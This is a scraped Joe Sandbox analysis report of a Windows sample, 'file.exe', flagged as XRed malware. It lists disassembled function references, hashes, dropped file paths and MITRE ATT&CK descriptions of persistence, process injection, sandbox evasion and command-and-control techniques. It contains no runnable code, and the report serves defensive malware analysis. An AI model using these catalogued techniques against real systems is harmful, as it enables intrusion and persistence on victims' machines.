Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: df7b988afa263ca22d162671130726baca592d49b61aeb8c3e56e45aece5f29c
Instruction ID: 4080eb391eab65b6dca37ce3baee6790d511c5be4562f824f991a1839e2f0985
Opcode Fuzzy Hash: df7b988afa263ca22d162671130726baca592d49b61aeb8c3e56e45aece5f29c
Instruction Fuzzy Hash: 58B01292658642BD320C23207D03C37024CC2C7F2533CF03EF608F9041F8842D046032

Function 00E894F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E894E7

Part of subcall function 00E89814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E89829
Part of subcall function 00E89814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E89891
Part of subcall function 00E89814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E898A2

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 895a37d973ca2e83ece284c2a4951d1f8d9b2ec9e6f7ca1542dc9eb893e52ec9
Instruction ID: b87be5210f7f80040009bf5d3ded07385b6d578f6ceab7853ddd675b1a3f1ef3
Opcode Fuzzy Hash: 895a37d973ca2e83ece284c2a4951d1f8d9b2ec9e6f7ca1542dc9eb893e52ec9
Instruction Fuzzy Hash: BCB012D5A68603AC324972142D43C37014CD1CAF1033CF13AB50CFB082E8402C0D4232

Function 00E894D5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E894E7

Part of subcall function 00E89814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E89829
Part of subcall function 00E89814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E89891
Part of subcall function 00E89814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E898A2

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 0b2d5189f778b7dde61f2f75ab0cacc2bd02fa8a662ffe42918cadbeea7acb4e
Instruction ID: 2354698c1b22f7c9f7389ba9765f62003b298726f035bbb80f6d7fa90702e268
Opcode Fuzzy Hash: 0b2d5189f778b7dde61f2f75ab0cacc2bd02fa8a662ffe42918cadbeea7acb4e
Instruction Fuzzy Hash: 1CB012D5A68702BC324832142DC3C37010CE5C6F1033CF17AB10CFB082E8402C054233

Function 00E89506 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E894E7

Part of subcall function 00E89814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E89829
Part of subcall function 00E89814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E89891
Part of subcall function 00E89814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E898A2

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 66f9772b05b31286f7f678b8847ffb70548d94b2aeccbd7192e97abe8dad659e
Instruction ID: 791473eda58d4f6ce5ec038620313990dbf90abf62cb66dce81a76ea8510cf50
Opcode Fuzzy Hash: 66f9772b05b31286f7f678b8847ffb70548d94b2aeccbd7192e97abe8dad659e
Instruction Fuzzy Hash: F5B012D5A68702AC324872547F83C37014CD5CAF1033CB17AB10CFB082F8402C064232

Function 00E414B2 Relevance: 1.3, APIs: 1, Instructions: 54stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,00E421B8,?,00000000,00000000,00000000,?,00E58A22,00000000,010C4840,00000000,00000000), ref: 00E414E4

Part of subcall function 00E43B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,00E421DC,000001C7,80004005,8007139F,?,?,00E8015F,8007139F,?,00000000,00000000,8007139F), ref: 00E43B59
Part of subcall function 00E43B51: HeapSize.KERNEL32(00000000,?,00E421DC,000001C7,80004005,8007139F,?,?,00E8015F,8007139F,?,00000000,00000000,8007139F), ref: 00E43B60

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 324cc53c2f79d0b84a1301bb80fe79f4c43e2c91c74f029ac74c7574d9d44265
Instruction ID: 5af9ab219800223c0f7da51e6a013d4fc76fd405f94808e70f7653d6f9f49d74
Opcode Fuzzy Hash: 324cc53c2f79d0b84a1301bb80fe79f4c43e2c91c74f029ac74c7574d9d44265
Instruction Fuzzy Hash: 6101F537300218AFCF215E64EC44FDA7796EF81764F214265FA29BB1A0D731AC909A90

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: XRed

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

452cb0.rbf (copy)

452cb5.rbf (copy)

452cb6.rbf (copy)

452cb7.rbf (copy)

452cb8.rbf (copy)

C:\Config.Msi\452caf.rbs

C:\Config.Msi\452cb4.rbs

C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

C:\ProgramData\Package Cache\.unverified\cab54A5CABBE7274D8A22EB58060AAB7623 (copy)

C:\ProgramData\Package Cache\.unverified\cabB3E1576D1FEFBB979E13B1A5379E0B16 (copy)

C:\ProgramData\Package Cache\.unverified\vcRuntimeAdditional_x86 (copy)

C:\ProgramData\Package Cache\.unverified\vcRuntimeMinimum_x86 (copy)

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre